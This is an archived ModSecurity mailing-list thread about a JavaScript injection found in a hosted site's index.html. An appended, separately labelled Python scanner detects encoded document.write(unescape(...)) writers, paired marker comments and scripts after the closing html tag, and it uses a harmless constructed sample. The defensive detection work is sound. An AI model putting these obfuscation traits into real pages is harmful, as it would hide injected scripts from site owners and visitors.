<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
</head>
<body bgcolor="#ffffff" text="#000000">
I don't know, but I seem to have noticed a big increase in the number
of attempts to hack my website lately as well. I don't know if any of
it is related to what happened to your client though.<br>
<br>
Drek<br>
<br>
<a class="moz-txt-link-abbreviated" href="mailto:admin@efastservers.com">admin@efastservers.com</a> wrote:
<blockquote cite="mid:md5:FFFFFF87FFFFFF8B2FFFFFFF8BFFFFFFECFFFFFFCF65"
type="cite">
<meta http-equiv="Content-Type" content="text/html; ">
<meta name="Generator" content="Microsoft Word 11 (filtered medium)">
<style>
<!--
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
        {margin:0in;
        margin-bottom:.0001pt;
        font-size:12.0pt;
        font-family:"Times New Roman";}
a:link, span.MsoHyperlink
        {color:blue;
        text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
        {color:purple;
        text-decoration:underline;}
span.EmailStyle17
        {mso-style-type:personal-compose;
        font-family:Arial;
        color:windowtext;}
@page Section1
        {size:8.5in 11.0in;
        margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
        {page:Section1;}
-->
</style>
<div class="Section1">
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">One of my resellers
contacted me today stating that one of
his websites was hacked and possibly the server. He wanted to know what
we were
going to do about it.<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">I checked the server but
no other website is affected except
for two of his own websites.<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">There seems to be some
type of JavaScript file injection
vuln going around. I searched the logs but could not find anything
obvious in
his logs. I checked all sites and they are clean.<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">Here is what was injected
into his index.html file after the
&lt;header&gt; tag.<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">There is a small
discussion about this at <a moz-do-not-send="true"
href="http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23">http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23</a><o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">Is there a mod_sec rule
that can stop this?<o:p></o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;"><o:p> </o:p></span></font></p>
<p class="MsoNormal"><font face="Arial" size="2"><span
style="font-size: 10pt; font-family: Arial;">Thanks<o:p></o:p></span></font></p>
</div>
<pre wrap="">
<hr size="4" width="90%">
_______________________________________________
Modsecurity mailing list
<a class="moz-txt-link-abbreviated" href="mailto:Modsecurity@gotroot.com">Modsecurity@gotroot.com</a>
<a class="moz-txt-link-freetext" href="http://lists.gotroot.com/mailman/listinfo/modsecurity">http://lists.gotroot.com/mailman/listinfo/modsecurity</a>
</pre>
</blockquote>
<br>
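<p>An added example, not part of either message and not a ModSecurity rule: a file check for the three traits visible in the block quoted in the original post, namely the paired &lt;!--[z0s]--&gt; marker comments, a script that calls document.write(unescape("%3Cscript...")), and a script element placed after the closing html tag. The function names, indicator labels and sample pages are constructed for illustration, and matching any word inside the marker brackets is an assumption that goes beyond the single z0s tag shown.</p>
<pre>
```python
import re
import sys
from pathlib import Path
from urllib.parse import unquote

# "\x3c" is the left angle bracket, escaped so this listing can sit in an HTML page.
# Paired marker comments around the injected block, such as [z0s] ... [/z0s].
# Accepting any word as the tag is an assumption; the post shows only z0s.
MARKER = re.compile(r"\x3c!--\[(\w+)\]-->.*?\x3c!--\[/\1\]-->", re.S)
# A script whose only job is to write a second, percent-encoded script.
WRITER = re.compile(r"document\.write\(\s*unescape\(\s*[\"'](%3Cscript[^\"']*)", re.I)
# A script element that starts after the closing html tag (heuristic).
TRAILER = re.compile(r"\x3c/html\s*>.*?\x3cscript\b", re.I | re.S)

# Constructed samples: a clean page and one carrying a harmless stand-in payload.
CLEAN = "\x3chtml>\x3cbody>hello\x3c/body>\x3c/html>\n"
INFECTED = (CLEAN + "\x3c!--[z0s]-->\x3cscript>document.write(unescape("
            "\"%3Cscript%3Evar%20demo%3D1%3C/script%3E\"))"
            "\x3c/script>\x3c!--[/z0s]-->\n")


def scan_html(text):
    """Return the sorted indicator names found in one HTML document."""
    checks = (("marker-comment-pair", MARKER),
              ("write-unescape-script", WRITER),
              ("script-after-html-close", TRAILER))
    return sorted(name for name, rx in checks if rx.search(text))


def decode_layer(text):
    """Percent-decode the first encoded layer for reading; nothing is executed."""
    m = WRITER.search(text)
    return unquote(m.group(1)) if m else None


def scan_tree(root):
    """Map each .htm/.html file under root that shows an indicator to its hits."""
    found = {}
    for path in sorted(Path(root).rglob("*.htm*")):
        hits = scan_html(path.read_text(errors="replace"))
        if hits:
            found[str(path)] = hits
    return found


if __name__ == "__main__":
    docroot = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, hits in scan_tree(docroot).items():
        print(name, ", ".join(hits))
```
</pre>
<p>Run it with a document root as the only argument; each line of output is a file path followed by the indicators that matched.</p>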
</body>
</html>